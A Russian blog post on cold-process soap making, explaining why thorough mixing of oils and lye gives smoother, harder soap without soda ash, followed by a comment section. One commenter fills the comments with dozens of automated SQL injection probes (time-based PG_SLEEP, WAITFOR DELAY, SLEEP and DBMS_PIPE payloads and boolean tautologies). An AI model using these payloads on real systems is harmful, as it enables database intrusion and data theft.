Как вы думаете, от чего зависит внешний вид и свойства мыла?
Давайте, накидаем варианты: от масел в составе, от количества воды, от используемых добавок, от способа приготовления... Это все понятные и логичные вещи.
А как насчет того, что внешний вид и свойства мыла зависят во многом от того, хорошо ли вы промешали масла со щелочью?
Весь последний год у меня был посвящен экспериментам именно с “промесом”. Некрасивое слово, но лучшего термина пока не подобрала.
Итак, что я подразумеваю под промесом - это отрезок времени между тем, как вы смешали масла со щелочью и вылили мыло в форму (мы сегодня с вами говорим о мыле ХС).
Что нам дает хороший промес:
💠Хорошую текстуру - мыло гладкое, отлично отстает от стенок формы, не оставляя следов
💠Твердость - после застывания мыло плотное, не проминается пальцем
💠Отсутствие содового пепла
💠Быстрое созревание
То есть мыло, сваренное при одних и тех же условиях, по одному и тому же рецепту может быть гладким, даже блестящим, плотным, а может крошиться, прилипать к стенкам и быть покрытым пеплом.
Для того, чтобы еще больше осознать важность тщательного перемешивания, погрузимся немного в теорию:
На начальном этапе реакции омыления скорость реакции зависит только от того, насколько велика площадь поверхности соприкосновения масел и щелочного раствора.
Для увеличения площади поверхности соприкосновения систему переводят в состояние тонкой эмульсии. Эмульгирование достигается за счет двух вещей: механического перемешивания и увеличения растворимости жиров в мыльном растворе, то есть образующееся мыло является эмульгатором и способствует увеличению скорости реакции.
То есть именно от того, насколько хорошо вы промешаете смесь первоначально зависит то, насколько быстро и “качественно” (если здесь подходит это слово) пройдет реакция.
Теперь тоже самое простым языком: когда вы перемешиваете массу, масла разбиваются на маленькие капельки, и раствору щелочи намного проще становится к ним подобраться. Дальше, когда масла со щелочью соединяются на поверхности капелек в едином порыве, образуется мыло, которое в свою очередь способствует тому, чтобы большее количество масел встретило свою щелочь, помогая капелькам распасться на еще более мелкие капельки.
Итак, как это делаю я (тут чисто мой практический опыт, уже не подкрепленный теорией):
💠Смешиваю масла и щелочной раствор
💠И даю им минут 10 “отдохнуть” и “подружиться”
Почему? Потому что так делает Лида, у которой самая шикарная текстура, которую мне доводилась трогать.
💠Хорошенько промешиваю ложкой.
💠Дальше - несколько (2-5) деликатных вжиков блендером.
💠Потом опять, примерно на протяжении минуты, ложкой
💠Чередую деликатные вжики блендером и ложку до тех пор, пока не получу красивую однородную массу.
В чем минус? В том что очень сложно поймать тот момент, когда масса уже хорошо промешана, но еще жидкая. Пока справляюсь незначительным увеличением количества воды (до 30%), но для многих техник все равно хочется более жидкую массу.
Продолжаю эксперименты и продолжаю держать вас в курсе.
Гладкой всем мыльной массы :)
Наталия Орбели
-
qpafhouk 22 ноября 2021 в 21:04555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'
-
qpafhouk 22 ноября 2021 в 21:04555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
-
qpafhouk 22 ноября 2021 в 21:04GsGUlV5U')) OR 31=(SELECT 31 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 21:04LXTsRi2P') OR 684=(SELECT 684 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 21:04eEIZmRO1' OR 165=(SELECT 165 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 21:04-1)) OR 380=(SELECT 380 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 21:04-5) OR 495=(SELECT 495 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 21:04-5 OR 582=(SELECT 582 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 21:04GD3brwXW'; waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 21:041 waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 21:04-1); waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 21:04-1; waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 21:04(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
-
qpafhouk 22 ноября 2021 в 21:040"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
-
qpafhouk 22 ноября 2021 в 21:040'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
-
qpafhouk 22 ноября 2021 в 21:04if(now()=sysdate(),sleep(12),0)
-
qpafhouk 22 ноября 2021 в 21:04495'
-
qpafhouk 22 ноября 2021 в 21:04-1" OR 2+879-879-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 21:04-1' OR 2+534-534-1=0+0+0+1 or 'gW89A67K'='
-
qpafhouk 22 ноября 2021 в 21:04-1' OR 2+415-415-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 21:04-1 OR 2+903-903-1=0+0+0+1
-
qpafhouk 22 ноября 2021 в 21:04-1 OR 2+787-787-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04555
-
qpafhouk 22 ноября 2021 в 21:04JyI=
-
qpafhouk 22 ноября 2021 в 21:04@@8KYTQ
-
qpafhouk 22 ноября 2021 в 21:04\
-
qpafhouk 22 ноября 2021 в 21:041'"
-
qpafhouk 22 ноября 2021 в 21:04555